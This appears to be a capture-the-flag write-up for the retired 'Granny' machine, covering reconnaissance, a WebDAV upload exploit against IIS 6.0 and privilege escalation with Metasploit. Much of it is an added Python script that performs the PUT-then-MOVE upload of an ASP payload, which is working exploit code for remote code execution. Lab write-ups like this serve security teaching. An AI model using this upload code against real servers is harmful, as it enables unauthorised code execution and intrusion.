Today we’re going to solve another CTF machine, “Granny”. It is now a retired box and is accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: HTTP
  • IP Address: 10.10.10.15
  • Difficulty: Easy

Weakness

  • Microsoft IIS version 6.0
  • ms15_051_client_copy_image

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify what is behind the IP address. After an intense scan of TCP and UDP ports we found only a single open port, TCP 80, and the banner identifies it as IIS httpd 6.0.

After some research we found a Metasploit module that turns WebDAV write access on IIS 6.0 into remote code execution:

https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp

Exploitation

Since we have found our vulnerability let’s try to exploit it.

After executing the exploit we instantly got a shell.
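For readers who want to see what the module actually sends on the wire, here is an added example (my own code, not the Rapid7 module and not part of the original write-up). IIS 6.0 with WebDAV write access accepts PUT, but the ASP handler mapping refuses a direct PUT of a `.asp` name; the trick the module uses is to PUT the payload with a harmless extension and then MOVE it to a `.asp` name, because MOVE is not subject to the same filter. The code first checks the `Allow` header from OPTIONS for PUT and MOVE, then performs the PUT/MOVE pair. The IP, the file name `shell` and the one-line ASP body are placeholders, and the `fake_iis6_transport` is a constructed stand-in for the server so the logic runs offline; swap in `tcp_transport(target)` to talk to a real host.

```python
"""Added example: IIS 6.0 WebDAV PUT-then-MOVE upload (not the Rapid7 module)."""
import socket
from typing import Callable

# A transport takes one raw HTTP request and returns the raw response.
Transport = Callable[[bytes], bytes]


def parse_status(response: bytes) -> int:
    """Return the HTTP status code from a raw response, or 0 if malformed."""
    parts = response.split(b"\r\n", 1)[0].split(b" ")
    if len(parts) < 2 or not parts[1].isdigit():
        return 0
    return int(parts[1])


def allowed_methods(response: bytes) -> set[str]:
    """Parse the Allow header of an OPTIONS response into a set of methods."""
    head = response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"allow":
            return {m.strip().upper() for m in value.decode("latin-1").split(",") if m.strip()}
    return set()


def options_request(host: str, path: str = "/") -> bytes:
    return f"OPTIONS {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def put_request(host: str, path: str, body: bytes) -> bytes:
    return (f"PUT {path} HTTP/1.1\r\nHost: {host}\r\nContent-Type: text/plain\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n").encode() + body


def move_request(host: str, src: str, dst: str) -> bytes:
    # Destination must be a full URI; Overwrite: T replaces an existing file.
    return (f"MOVE {src} HTTP/1.1\r\nHost: {host}\r\nDestination: http://{host}{dst}\r\n"
            f"Overwrite: T\r\nConnection: close\r\n\r\n").encode()


def webdav_writable(send: Transport, host: str) -> bool:
    """Recon check: the server must advertise both PUT and MOVE."""
    return {"PUT", "MOVE"} <= allowed_methods(send(options_request(host)))


def upload_asp(send: Transport, host: str, asp_body: bytes, name: str = "shell") -> str:
    """PUT the payload as .txt, then MOVE it to .asp. Returns the final path."""
    txt_path, asp_path = f"/{name}.txt", f"/{name}.asp"
    status = parse_status(send(put_request(host, txt_path, asp_body)))
    if status not in (200, 201, 204):
        raise RuntimeError(f"PUT {txt_path} failed: HTTP {status}")
    status = parse_status(send(move_request(host, txt_path, asp_path)))
    if status not in (201, 204):
        raise RuntimeError(f"MOVE to {asp_path} failed: HTTP {status}")
    return asp_path


def tcp_transport(host: str, port: int = 80) -> Transport:
    """Real transport: one TCP connection per request (we send Connection: close)."""
    def send(raw: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=10) as s:
            s.sendall(raw)
            chunks = []
            while data := s.recv(4096):
                chunks.append(data)
        return b"".join(chunks)
    return send


def fake_iis6_transport(log: list) -> Transport:
    """Constructed stand-in for an IIS 6 WebDAV server (offline testing only):
    rejects a direct PUT of .asp, accepts PUT of .txt and MOVE to .asp."""
    def send(raw: bytes) -> bytes:
        log.append(raw)
        method, target = raw.split(b" ", 2)[:2]
        if method == b"OPTIONS":
            return (b"HTTP/1.1 200 OK\r\nAllow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, "
                    b"COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n\r\n")
        if method == b"PUT":
            if target.endswith(b".asp"):
                return b"HTTP/1.1 403 Forbidden\r\n\r\n"
            return b"HTTP/1.1 201 Created\r\n\r\n"
        if method == b"MOVE":
            return b"HTTP/1.1 201 Created\r\n\r\n"
        return b"HTTP/1.1 405 Method Not Allowed\r\n\r\n"
    return send


if __name__ == "__main__":
    target = "10.10.10.15"  # Granny's IP from the write-up
    send = fake_iis6_transport([])  # replace with tcp_transport(target) for a live run
    if webdav_writable(send, target):
        print("uploaded", upload_asp(send, target, b'<% Response.Write("dav-test") %>'))
```

On a real target the Metasploit module uploads a full ASP stager rather than this one-liner; the request sequence is the same. If the OPTIONS check reports PUT but not MOVE, the extension filter still blocks the rename and this route will not work.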

Privilege Escalation

We now have user-level access and are going after NT AUTHORITY\SYSTEM. The initial session is fragile and we can’t even run getuid, so we background the shell and use the post/windows/manage/migrate module.

This module spawns a notepad.exe process and migrates our shell into it. All it needs is the ID of the session we backgrounded earlier.

It worked anyway!

At this point it is a good idea to migrate into a process running as NT AUTHORITY\NETWORK SERVICE. Here davcdata.exe seemed to be the only stable process available. The intended exploit is ms15_051_client_copy_image, which immediately grants a root (NT AUTHORITY\SYSTEM) shell.

After running the exploit suggester module we got a list of local exploits this machine is likely vulnerable to.

So, now we have to test every exploit to see which actually works.

I found this one useful.